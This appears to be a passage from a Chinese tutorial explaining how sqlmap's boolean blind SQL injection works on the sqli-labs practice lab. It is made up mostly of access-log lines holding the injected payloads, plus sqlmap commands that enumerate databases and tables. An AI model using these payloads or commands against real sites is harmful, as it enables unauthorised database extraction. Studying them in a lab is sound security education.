10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),6,1))>104 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),6,1))>108 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),6,1))>106 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),6,1))>105 AND 'GsZM'='GsZM HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),7,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),7,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),7,1))>120 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),7,1))>116 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),7,1))>114 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),7,1))>115 AND 'GsZM'='GsZM HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),8,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),8,1))>112 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),8,1))>120 AND 'GsZM'='GsZM HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),8,1))>124 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),8,1))>122 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),8,1))>121 AND 'GsZM'='GsZM HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),9,1))>96 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),9,1))>48 AND 'GsZM'='GsZM HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),9,1))>1 AND 'GsZM'='GsZM HTTP/1.1" 200 670

test 数据库

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>64 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>96 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>112 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>120 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>116 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>114 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),1,1))>115 AND 'tGoW'='tGoW HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),2,1))>96 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),2,1))>112 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),2,1))>104 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),2,1))>100 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),2,1))>102 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),2,1))>101 AND 'tGoW'='tGoW HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),3,1))>96 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),3,1))>112 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),3,1))>120 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),3,1))>116 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),3,1))>114 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),3,1))>115 AND 'tGoW'='tGoW HTTP/1.1" 200 670

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),4,1))>96 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),4,1))>112 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),4,1))>120 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),4,1))>116 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),4,1))>114 AND 'tGoW'='tGoW HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),4,1))>115 AND 'tGoW'='tGoW HTTP/1.1" 200 750

10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),5,1))>96 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),5,1))>48 AND 'tGoW'='tGoW HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:51  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),5,1))>1 AND 'tGoW'='tGoW HTTP/1.1" 200 670

当前数据库

查询当前数据库

sqlmap -u "http://10.211.55.3/sqli/Less-1/?id=1" -v 3 --technique=B --current-db

sqlmap 返回:

[14:17:11] [INFO] retrieved: security
[14:17:11] [DEBUG] performed 52 queries in 0.28 seconds
current database: 'security'

直接调用了DATABASE()函数来查询当前的数据库,然后结合 ascii 码来进行逐一判断:

# chr(115)='s'
10.211.55.2 - - [02/Nov/2019:20:20:37  0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115 AND 'mBTU'='mBTU HTTP/1.1" 200 670

# chr(101)='e'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101 AND 'mBTU'='mBTU HTTP/1.1" 200 670

# chr(99)='c'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>98 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>99 AND 'mBTU'='mBTU HTTP/1.1" 200 670

# chr(117)='u'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>120 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>116 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>118 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>117 AND 'mBTU'='mBTU HTTP/1.1" 200 670

# chr(113)='r'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>120 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>116 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>114 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>113 AND 'mBTU'='mBTU HTTP/1.1" 200 750

# chr(105)='i'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>104 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>108 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>106 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>105 AND 'mBTU'='mBTU HTTP/1.1" 200 670

# chr(116)='t'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>120 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>116 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>114 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>115 AND 'mBTU'='mBTU HTTP/1.1" 200 750

# chr(121)='y'
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>112 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>120 AND 'mBTU'='mBTU HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>124 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>122 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>121 AND 'mBTU'='mBTU HTTP/1.1" 200 670

# > 1 都报错了 这个第19位不存在
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>96 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>48 AND 'mBTU'='mBTU HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:20:38  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>1 AND 'mBTU'='mBTU HTTP/1.1" 200 670

查询当前数据库下表名

查询当前数据库下表

sqlmap -u "http://10.211.55.3/sqli/Less-1/?id=1" -v 3 --technique=B -D security --tables

sqlmap 返回:

[14:18:47] [INFO] retrieved: users
[14:18:47] [DEBUG] performed 29 queries in 0.17 seconds
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

表的数量

CAST(COUNT(table_name) AS CHAR)统计当前数据库表的数量chr(52)=4

10.211.55.2 - - [02/Nov/2019:20:27:29  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),1,1))>51 AND 'eEWK'='eEWK HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),1,1))>54 AND 'eEWK'='eEWK HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:20:27:30  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479),1,1))>52 AND 'eEWK'='eEWK HTTP/1.1" 200 670

